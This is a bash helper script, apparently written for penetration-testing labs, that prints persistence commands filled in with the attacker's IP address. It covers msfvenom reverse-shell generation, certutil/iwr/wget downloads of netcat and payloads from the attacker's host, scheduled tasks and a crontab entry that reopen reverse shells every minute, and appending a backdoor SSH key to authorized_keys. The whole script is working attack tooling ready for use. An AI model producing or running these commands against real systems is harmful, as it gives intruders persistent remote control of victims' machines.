#!/bin/bash

DEFAULT_TOOLS_PORT=31337
TOOLS_PATH="/home/kali/tools"

# Colors
GREEN='\033[0;32m' # Green
NC='\033[0m'       # No Color


# Make this work for local lab also
if ip -4 a show tun0 &> /dev/null; then
    LHOST=$(ip -4 a show tun0 | grep -Po 'inet \K[\d.]+')
else
    LHOST=$(ip -4 a show wlan0 | grep -Po 'inet \K[\d.]+')
fi


if [ $# -eq 0 ]
then
  LPORT=443
else
  LPORT=$1
fi

cat << "EOF"

  _____              _     _                      
 |  __ \            (_)   | |                     
 | |__) |__ _ __ ___ _ ___| |_ ___ _ __   ___ ___ 
 |  ___/ _ \ '__/ __| / __| __/ _ \ '_ \ / __/ _ \
 | |  |  __/ |  \__ \ \__ \ ||  __/ | | | (_|  __/
 |_|   \___|_|  |___/_|___/\__\___|_| |_|\___\___|
                                                  
                                                                        
EOF

#https://patorjk.com/software/taag/#p=display&f=Big&t=Persistence

echo -e "LHOST=${GREEN}$LHOST${NC}"
echo -e "DEFAULT_TOOLS_PORT=${GREEN}$DEFAULT_TOOLS_PORT${NC}"
echo
echo

echo '********** Windows **********'
echo
echo "msfvenom -p windows/x64/shell_reverse_tcp LHOST=$LHOST LPORT=443 -f exe > $TOOLS_PATH/adhoc/revshells/reverse_shell_443.exe" 
echo "msfvenom -p windows/x64/shell_reverse_tcp LHOST=$LHOST LPORT=53 -f exe >  $TOOLS_PATH/adhoc/revshells/reverse_shell_53.exe" 
echo
echo "# C:\Temp"
echo "certutil.exe -urlcache -f http://$LHOST:$DEFAULT_TOOLS_PORT/windows/nc64.exe C:\Temp\nc.exe"
echo "iwr -uri http://$LHOST:$DEFAULT_TOOLS_PORT/windows/nc64.exe -Outfile C:\Temp\nc.exe"
echo
echo "# C:\Windows\Temp"
echo "certutil.exe -urlcache -f http://$LHOST:$DEFAULT_TOOLS_PORT/windows/nc64.exe C:\Windows\Temp\nc.exe"
echo "iwr -uri http://$LHOST:$DEFAULT_TOOLS_PORT/windows/nc64.exe -Outfile C:\Windows\Temp\nc.exe"
echo
echo
echo "# reverse shell binary"
echo "certutil.exe -urlcache -f http://$LHOST:$DEFAULT_TOOLS_PORT/adhoc/revshells/reverse_shell_443.exe C:\Temp\reverse_shell_443.exe"
echo "certutil.exe -urlcache -f http://$LHOST:$DEFAULT_TOOLS_PORT/adhoc/revshells/reverse_shell_53.exe C:\Temp\reverse_shell_53.exe"
echo
echo "schtasks /create /sc minute /mo 1 /tn \"Reverse shell\" /tr \"C:\Temp\nc.exe $LHOST $LPORT -e cmd.exe\""
echo "schtasks /create /sc minute /mo 1 /tn \"Reverse shell\" /tr \"C:\Windows\Temp\nc.exe $LHOST $LPORT -e cmd.exe\""
echo
echo "schtasks /create /sc minute /mo 1 /tn \"Reverse shell\" /tr \"C:\Temp\reverse_shell_443.exe\""
echo "schtasks /create /sc minute /mo 1 /tn \"Reverse shell\" /tr \"C:\Temp\reverse_shell_53.exe\""
echo
echo

echo '********** Linux **********'
echo
echo "msfvenom -p linux/x64/shell_reverse_tcp LHOST=$LHOST LPORT=443 -f elf -o $TOOLS_PATH/adhoc/revshells/reverse_shell_443"
echo "msfvenom -p linux/x64/shell_reverse_tcp LHOST=$LHOST LPORT=53 -f elf -o  $TOOLS_PATH/adhoc/revshells/reverse_shell_53"
echo
echo "wget -O /tmp/reverse_shell_443 http://$LHOST:$DEFAULT_TOOLS_PORT/adhoc/revshells/reverse_shell_443 && chmod +x /tmp/reverse_shell_443  && /tmp/reverse_shell_443"
echo "wget -O /tmp/reverse_shell_53 http://$LHOST:$DEFAULT_TOOLS_PORT/adhoc/revshells/reverse_shell_53 && chmod +x /tmp/reverse_shell_53  && /tmp/reverse_shell_53"
echo
echo "(touch .tab ; echo \"*/1 * * * * /bin/bash -c '/bin/bash -i >& /dev/tcp/$LHOST/$LPORT 0>&1'\" >> .tab ; crontab .tab ; rm .tab) > /dev/null 2>&1"
echo
BACKDOOR_PUB=$(cat ~/.ssh/backdoor.pub)
echo "echo \"$BACKDOOR_PUB\" >> /home/<user>/.ssh/authorized_keys"
echo
echo
